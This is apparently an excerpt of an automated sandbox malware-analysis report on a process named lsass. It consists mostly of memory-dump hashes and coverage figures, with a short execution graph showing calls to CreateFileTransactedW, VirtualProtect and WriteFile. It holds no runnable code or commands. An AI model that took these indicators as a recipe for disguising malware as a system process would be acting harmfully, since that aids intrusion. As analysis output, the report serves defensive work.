                                        • Instruction ID: fc0e4ca72914cbf5ce76956806e7720979509753bce15e9a01e01ed637b77bc2
                                        • Opcode Fuzzy Hash: c675962be026c5a6a83d17fa0d9ae10361877331b86f9b447437e2dce15cf149
                                        • Instruction Fuzzy Hash: 1E210A61B0DA4D4FE354E7B888A477473D9EF98314F0542BAD00DC72E7CD6D69498341
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 15a27ee4ba9616abd9656566aa565270ff697f233e224205219c1f8d2e3ae4a9
                                        • Instruction ID: bb8f1cc2f548ba8bf761ae596f648c49945b553171fabcd0ee7c13781be7b16d
                                        • Opcode Fuzzy Hash: 15a27ee4ba9616abd9656566aa565270ff697f233e224205219c1f8d2e3ae4a9
                                        • Instruction Fuzzy Hash: AB212B50A2E45F8BE338865848744B477BDEF50301B1985BDC44BCB4EBC92DBAC59381
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5641b36d584bf0908415f9703de8b2493836ca9f84ad869f3583b013f5890c52
                                        • Instruction ID: 43a0ad75c6292a8c0410512178bcf6d0a609864f92c5adfff7633a8a308eb563
                                        • Opcode Fuzzy Hash: 5641b36d584bf0908415f9703de8b2493836ca9f84ad869f3583b013f5890c52
                                        • Instruction Fuzzy Hash: F4213832B0D25D8FE732E7A89C250EC7B60EF42325F0541B3D5588B1D3DA382646CB85
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c2269309be3e54af16f4090d2fd9ffecb5b0bd8ed14f84c07edee621db0db76e
                                        • Instruction ID: f66ec2e7d5e14ae53d9d34f79e11aaf0c5a3e88c1627f7144f103b6009c15f78
                                        • Opcode Fuzzy Hash: c2269309be3e54af16f4090d2fd9ffecb5b0bd8ed14f84c07edee621db0db76e
                                        • Instruction Fuzzy Hash: 23215075E1994ECFDB98DB98D8A09ECB7B5FF58300F11017AD00EE72A2DA296D05CB50
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 56143059b5dcb282c0229496947620d68ded35af37e125e7c93c28428a269597
                                        • Instruction ID: e89db357d1f0c09127a0a7a6184ec4443fa92ca8f27299a3452364a7a4e2e6c9
                                        • Opcode Fuzzy Hash: 56143059b5dcb282c0229496947620d68ded35af37e125e7c93c28428a269597
                                        • Instruction Fuzzy Hash: 07110431B1AB0E9FDB6AAB6490619FA73E4FF54354B01063AD00EC75E2CE29B505CB80
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e602e7da71b625b07903b806221ef20a4fa33bc231f2436a400047d9669a1621
                                        • Instruction ID: 32f882aceebea75ef7b9e9420cda878c7a5f9ef467791743e42c0a570b840f4f
                                        • Opcode Fuzzy Hash: e602e7da71b625b07903b806221ef20a4fa33bc231f2436a400047d9669a1621
                                        • Instruction Fuzzy Hash: D7112731B2A95E4BF3A4EA5D88B47B073C6EF94321F484279D40DC32EADD29BD854781
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 31ce17d8fbee9976ac53c473f863880584a8c0e5be6e058e9eb6bc12ac9c9021
                                        • Instruction ID: 4dc772075eebbfad397a79c8e379ded5263de028b9cdda5c10f7b8bb30d299c9
                                        • Opcode Fuzzy Hash: 31ce17d8fbee9976ac53c473f863880584a8c0e5be6e058e9eb6bc12ac9c9021
                                        • Instruction Fuzzy Hash: A811E971B0994D4BE358FB7888A5B7572D9EF9C314F05427AE40EC72E6CE2979448340
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1ad2a6eeef18ceeeb14d07e9daf6f425e58a15b45c0bd4f450234938f106769c
                                        • Instruction ID: 361f376605bcf4f043d1ba6cb24780d4c2a71083f44de534eef35745ed5d400b
                                        • Opcode Fuzzy Hash: 1ad2a6eeef18ceeeb14d07e9daf6f425e58a15b45c0bd4f450234938f106769c
                                        • Instruction Fuzzy Hash: A8119421F0A92E4BEBB0DB9888747B872E1EF58711F1142B7C42DD32B1DD68AE408F40
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 945b6c202f68ee96f7258680ae12db74a64aecd14ad1ee2cb1556115108c3ad7
                                        • Instruction ID: 60c28d4f1c5ab7f894d3815f9e309929ac00c41e842e5a92f7ba6d84a0eb841f
                                        • Opcode Fuzzy Hash: 945b6c202f68ee96f7258680ae12db74a64aecd14ad1ee2cb1556115108c3ad7
                                        • Instruction Fuzzy Hash: 16110831B0D65D8FE732DBB988651EC7FB0EF42311F1644B7C054DB2A2EA7456458B84
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b9e816371c89fd529b240555a7ddd66236bd5e972223043fd67056c4b08d6764
                                        • Instruction ID: 4c74df4432ca2e5b2e681e9a881ca7e7382d44349f95b4233ed985b7a86ddcbb
                                        • Opcode Fuzzy Hash: b9e816371c89fd529b240555a7ddd66236bd5e972223043fd67056c4b08d6764
                                        • Instruction Fuzzy Hash: FA018470A0A60E8BE738DF54C4A17793799FF94300F52067AC449972F6DE3DBA418781
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cc7d1ffd83821171b94f165a5ed44cb45259ed2614622081382f7f5a80aba901
                                        • Instruction ID: 82d3510084a0d742e9034039511c95484989bc917df67a674b3dbde11e08606a
                                        • Opcode Fuzzy Hash: cc7d1ffd83821171b94f165a5ed44cb45259ed2614622081382f7f5a80aba901
                                        • Instruction Fuzzy Hash: CC11B13190496C8FDBA8DB04C894B9D77B1EB58301F1585ADC40EE72A0CA75AE84CF85
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 16717d544ccca9611bb0cca723affb2b43373dc4c6a30e8a65eb0cbedd274d43
                                        • Instruction ID: 42c4381682ee6f0b3b3b383c4e516abd6e980c4d4710ac3036c276ccd532c840
                                        • Opcode Fuzzy Hash: 16717d544ccca9611bb0cca723affb2b43373dc4c6a30e8a65eb0cbedd274d43
                                        • Instruction Fuzzy Hash: 2501D231B0E29C8FE722DBA888641EDBFB0EF42310F1645F7C454DB2A2DA345645CB84
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ddc5bc062321c2859f8c02752c1ad0e7799a4b0c7665c0376f7cbd10d437b30d
                                        • Instruction ID: 57d3422f6f23d38fbe1eee45c134395ff27e7f67c20488c50ab1f42a5746e604
                                        • Opcode Fuzzy Hash: ddc5bc062321c2859f8c02752c1ad0e7799a4b0c7665c0376f7cbd10d437b30d
                                        • Instruction Fuzzy Hash: E001D130A0970D8BE734DF54C4917B937A5FFA4310F11067AC046972A7CA3AB941CBC0
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 611bd26d6ab4ab831f0c35118a15265da753d2fabbf034af2387fe41706da087
                                        • Instruction ID: 5070d1e6b2dcae76a094dc5e8946e8e1eca50149055df94663671a39818a4809
                                        • Opcode Fuzzy Hash: 611bd26d6ab4ab831f0c35118a15265da753d2fabbf034af2387fe41706da087
                                        • Instruction Fuzzy Hash: 54F0967154F3C9AFD7228BB088215D93FB8EF43214B1A00F6D495CB0B2C56D5B46C762
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c597f3eb412ccf7ae1b4052d30f26890b97bef4a3bbf2576622ea034f6ef18b4
                                        • Instruction ID: 7e6abb73beeb39def28f7ac367a2a7777468cf1e6c06d81b415f0cf612dbc39b
                                        • Opcode Fuzzy Hash: c597f3eb412ccf7ae1b4052d30f26890b97bef4a3bbf2576622ea034f6ef18b4
                                        • Instruction Fuzzy Hash: 4701B131A0E28C8FE722DBA8886419CBFB0EF42310F1541E7D450DB2A6EA345644CB80
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 31176d9e0dc5d3a3d2a023bce21f68e413a9c5502f226333fb1c792caeea09f1
                                        • Instruction ID: dc56fb0b3d98725fe4b6653ce8ed82e70316826ec4480776353e6c05e3d5cfe2
                                        • Opcode Fuzzy Hash: 31176d9e0dc5d3a3d2a023bce21f68e413a9c5502f226333fb1c792caeea09f1
                                        • Instruction Fuzzy Hash: 55F0A021B0DB880FC76A566D48A8061BFE1DBAA51134A53EFC045CB6B3ED59AC898342
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4eb1ffb5accd51ad36bdc4814720d1f5197c5ab215985cd5784c1b037849105d
                                        • Instruction ID: af639c424b252f5fa5db2f4a3a258807e4ba1ded573f9e5b69aef53d2e8528f3
                                        • Opcode Fuzzy Hash: 4eb1ffb5accd51ad36bdc4814720d1f5197c5ab215985cd5784c1b037849105d
                                        • Instruction Fuzzy Hash: FEF03630B0A92E8AEB74DB54DC647F873A1EF54311F1142B6C41AD31B1DDB96AC58F00
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 503368e294ea1390e0962fbb6cb8f133d2f9d11313eff96316767aa6eb176c77
                                        • Instruction ID: f8fc8f086b6137360f1e985ce6c11eea738fa21fc88d6fa54b821d541ec201d2
                                        • Opcode Fuzzy Hash: 503368e294ea1390e0962fbb6cb8f133d2f9d11313eff96316767aa6eb176c77
                                        • Instruction Fuzzy Hash: E501A230E0E28D8FE731DBA4886419DBFB0EF46314F1541E7D454DB2A6EA785644CB45
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ef4601ae45a06a77248c753546aff5bcb5e04059b921ee826eb48a5e68162104
                                        • Instruction ID: ce45e0d2416faefd647106c6a0a8830557c119d7b8a07d8f6187189ebb314324
                                        • Opcode Fuzzy Hash: ef4601ae45a06a77248c753546aff5bcb5e04059b921ee826eb48a5e68162104
                                        • Instruction Fuzzy Hash: AFF0AB3560DA49CFDB84AB38ECA18D0BF60EF07208B4615EEC089C70A3E250191CC700
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0800f8298a5483d36ed203f0836652edf35d9cc4f20f43554f234bba05ae465a
                                        • Instruction ID: afddf22e0577f507906c820da2a84540cc9efb90aafbd809d60d59947eb02334
                                        • Opcode Fuzzy Hash: 0800f8298a5483d36ed203f0836652edf35d9cc4f20f43554f234bba05ae465a
                                        • Instruction Fuzzy Hash: 3DE0D820709B884FC70E56388C695507FB1EB6710278A02DBD005CB2A3ED19DCC9C741
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 620c400f58104c25ee72f0295a701db363e685c0fd8beffa55c38e5a76923487
                                        • Instruction ID: 9f8e6dc2377c6506cd56cbd4283d7fa592cdf2ac84363c4df4592e203123e5ab
                                        • Opcode Fuzzy Hash: 620c400f58104c25ee72f0295a701db363e685c0fd8beffa55c38e5a76923487
                                        • Instruction Fuzzy Hash: 06F05430B0A52E4AEBB0D784D8A47F97391EF54311F114277C42DD71F2DD696E458E40
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 823e00c4012131f225cbea92937d3ad1c2cb8ddf5a5f4ede266f3cd96edb8a43
                                        • Instruction ID: 1404fd9998182d2bd5161342a22ed76b9f7ac2f77f8f6164142c1f0ffa22654e
                                        • Opcode Fuzzy Hash: 823e00c4012131f225cbea92937d3ad1c2cb8ddf5a5f4ede266f3cd96edb8a43
                                        • Instruction Fuzzy Hash: ABF0653030950B8BE729DA88C0A57A573D9EB54304F15413DD516C77E1DB7AB5408B40
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 26fa3b39cc0c20e7d6504f4ddefd72dea81e5e6ce85381d73b810566bc12f261
                                        • Instruction ID: 1f91ac152701918e2b9ccb753d4d209ecdd82b9e5d4f406bef456d79caaaf0ea
                                        • Opcode Fuzzy Hash: 26fa3b39cc0c20e7d6504f4ddefd72dea81e5e6ce85381d73b810566bc12f261
                                        • Instruction Fuzzy Hash: CCE04F6694F7C04FCB1B9B3588B88903F70EE5761074A51EAC045CF1B3D91A9D4AC701
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: adfefc78be286baa70d8127a01833431ec7a8f5ba8ca94a7f1aedb3396401bcf
                                        • Instruction ID: 4fd8c9169543bd2b545fc227e118e41cb778c437ebcb1fad26441731ff349397
                                        • Opcode Fuzzy Hash: adfefc78be286baa70d8127a01833431ec7a8f5ba8ca94a7f1aedb3396401bcf
                                        • Instruction Fuzzy Hash: 7FE08611F1E51D07F67456FC54392B53381EB84710F124379E45E833E2ECBCA9430545
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 33ce092d330706656787fe6c1980c23132291f1bbc9d9feda2edb2cb72a22dcb
                                        • Instruction ID: 5311e8d633b42a250be9cb45fd10ebe24f6b6b5e350b92b90a0f9787c02c5e17
                                        • Opcode Fuzzy Hash: 33ce092d330706656787fe6c1980c23132291f1bbc9d9feda2edb2cb72a22dcb
                                        • Instruction Fuzzy Hash: 21E09B31B0852A87F7299744C8707B83265EB94300F1541BDC95FD36E1DD786E018A84
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7fdf602137d90e6debaf839302e7d69ca211fd4c7a08774291bb3d48c776c48c
                                        • Instruction ID: 30aed3dc3bc570caf775bb6eac20c41e74e3e9b8ff89cf05638fa160c359512c
                                        • Opcode Fuzzy Hash: 7fdf602137d90e6debaf839302e7d69ca211fd4c7a08774291bb3d48c776c48c
                                        • Instruction Fuzzy Hash: FDC08C32E2FA5902EA64D3BA0CB301038C0EB8F304FCB00F4E5AC802E2EC8E15498246
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 01e38e70d1fa6bb65dd097346d22abdbea730342f4aa22208da91687ed01f3b5
                                        • Instruction ID: fb7d575317d99b2d6e583da376a67d8a6c0d87e5e348c7ee0fe165f5f94f7796
                                        • Opcode Fuzzy Hash: 01e38e70d1fa6bb65dd097346d22abdbea730342f4aa22208da91687ed01f3b5
                                        • Instruction Fuzzy Hash: 41C04C05F5B53F01F53573EF58760ADB5409BD5A50FD70176D52C800E19CDD22D5095E
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6f60e8a32dc7cd82cdab9b8126faffc729a7f5ee650283cebf0420754674fa9f
                                        • Instruction ID: 5c3836401fa5f36ba66d385df7dbf7d4ed3a959fc71f56cc2a164d6d90b52acd
                                        • Opcode Fuzzy Hash: 6f60e8a32dc7cd82cdab9b8126faffc729a7f5ee650283cebf0420754674fa9f
                                        • Instruction Fuzzy Hash: 08D0C994B0F65F85F13B4AC1407023951AC5F41700E22413DD06F418F1DD1F7B016211
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 91e834ae1ae304aeaed4e0af4b4142cc12e6c9d767d6e7de685406348d3faab0
                                        • Instruction ID: 9dc8980ef5b234010dabf8dd927e35685d1c14c9b44a943e9c02e1918835d4eb
                                        • Opcode Fuzzy Hash: 91e834ae1ae304aeaed4e0af4b4142cc12e6c9d767d6e7de685406348d3faab0
                                        • Instruction Fuzzy Hash: 15C04C01F19C2A16F25E7718553167D08439F5461CFD54179E82ED63CECE5C5B0506C6
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2131312949.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bea0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9120d7d5d510d60ddd58d7ec11383884db066a8e4b3a30c3828bebc2efdefe9d
                                        • Instruction ID: 3c6ca6db2bb23bad56b9c5541718cc6c178af57e2016516e12501095d08f1f63
                                        • Opcode Fuzzy Hash: 9120d7d5d510d60ddd58d7ec11383884db066a8e4b3a30c3828bebc2efdefe9d
                                        • Instruction Fuzzy Hash: 35C04C80F0E34A66E63515E005A107D07881B16644B5615B1D546651E3E84D6A055611
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bfec55d506deb6a0e66d98d92f25c69081eec8d6f86558604ed38352e00b2f3f
                                        • Instruction ID: 7ad76d07ff73bcb551725c24866291c2a8f6a14c1a88fed5b5653d8c15e37f51
                                        • Opcode Fuzzy Hash: bfec55d506deb6a0e66d98d92f25c69081eec8d6f86558604ed38352e00b2f3f
                                        • Instruction Fuzzy Hash: 28B01200D5741F00E43433FB0C5206974409B44100FC20070D41C8009198CD12D40A46
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2126612701.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_22_2_7ffd9bab0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: c9$!k9$"s9$#{9
                                        • API String ID: 0-1692736845
                                        • Opcode ID: d59053071498ded36b2a0733dd21947c896e337ec829b81f1db0c2306f994b14
                                        • Instruction ID: da433a151d44defa96aa13487a96a2101b75b00cfcfe6e92f3eb4b380a84e17a
                                        • Opcode Fuzzy Hash: d59053071498ded36b2a0733dd21947c896e337ec829b81f1db0c2306f994b14
                                        • Instruction Fuzzy Hash: AB418E07B0957645E23973FD78219E95B848FA927FB0847B7F56E8D0D78C486082C2E9

                                        Execution Graph

                                        Execution Coverage:14.1%
                                        Dynamic/Decrypted Code Coverage:33.3%
                                        Signature Coverage:0%
                                        Total number of Nodes:9
                                        Total number of Limit Nodes:0
                                        execution_graph 4379 7ffd9baf5505 4381 7ffd9baf551e CreateFileTransactedW 4379->4381 4382 7ffd9baf561a 4381->4382 4387 7ffd9babb4ba 4388 7ffd9babb4c9 VirtualProtect 4387->4388 4390 7ffd9babb5ae 4388->4390 4383 7ffd9baf56e1 4385 7ffd9baf56fe WriteFile 4383->4385 4386 7ffd9baf57c7 4385->4386

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2274178941.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9bab0000_lsass.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 5Z_H
                                        • API String ID: 0-3267294416
                                        • Opcode ID: cb4dcab49a2a047fc49b212eace48576a2ef573ae5db9c8bb1e29fe0fae272cb
                                        • Instruction ID: 08dd1c3198defe92940c35b82990a1fc83b96563d9f65f10ab6761ce984ab2e1
                                        • Opcode Fuzzy Hash: cb4dcab49a2a047fc49b212eace48576a2ef573ae5db9c8bb1e29fe0fae272cb
                                        • Instruction Fuzzy Hash: 01812861A0DADD4FE769DB6888397A87FE1FF55314F4501BED099C72E6DBB818048B00

                                        Control-flow Graph

                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2274178941.00007FFD9BAF5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF5000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baf5000_lsass.jbxd
                                        Similarity
                                        • API ID: CreateFileTransacted
                                        • String ID:
                                        • API String ID: 2149338676-0
                                        • Opcode ID: 4796271d2ad1337c1c9a3129debf1b46703229da2b4c982ce56501b339ebe98b
                                        • Instruction ID: 7f4a8d847c455cd6afa23a4085d7a760cc687cb17c68a62621130dfee04cd0cd
                                        • Opcode Fuzzy Hash: 4796271d2ad1337c1c9a3129debf1b46703229da2b4c982ce56501b339ebe98b
                                        • Instruction Fuzzy Hash: D2418F7191CB588FDB58EF5CD845AE97BF0FB69720F00426FE449E3251CA74A845CB82

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 21 7ffd9baf56e1-7ffd9baf5771 25 7ffd9baf577b-7ffd9baf57c5 WriteFile 21->25 26 7ffd9baf5773-7ffd9baf5778 21->26 27 7ffd9baf57c7 25->27 28 7ffd9baf57cd-7ffd9baf57f5 25->28 26->25 27->28
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000001B.00000002.2274178941.00007FFD9BAF5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF5000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_27_2_7ffd9baf5000_lsass.jbxd
                                        Similarity
                                        • API ID: FileWrite
                                        • String ID:
                                        • API String ID: 3934441357-0
                                        • Opcode ID: 6a50d26688d0c82a4e25f5763308ffc4608d3aeecc20f0c39b0d31bb84f1e21d
                                        • Instruction ID: 635ec605bf339c6d905880c143fde5a704e89dc67ab691c9f2da400ab4227f81
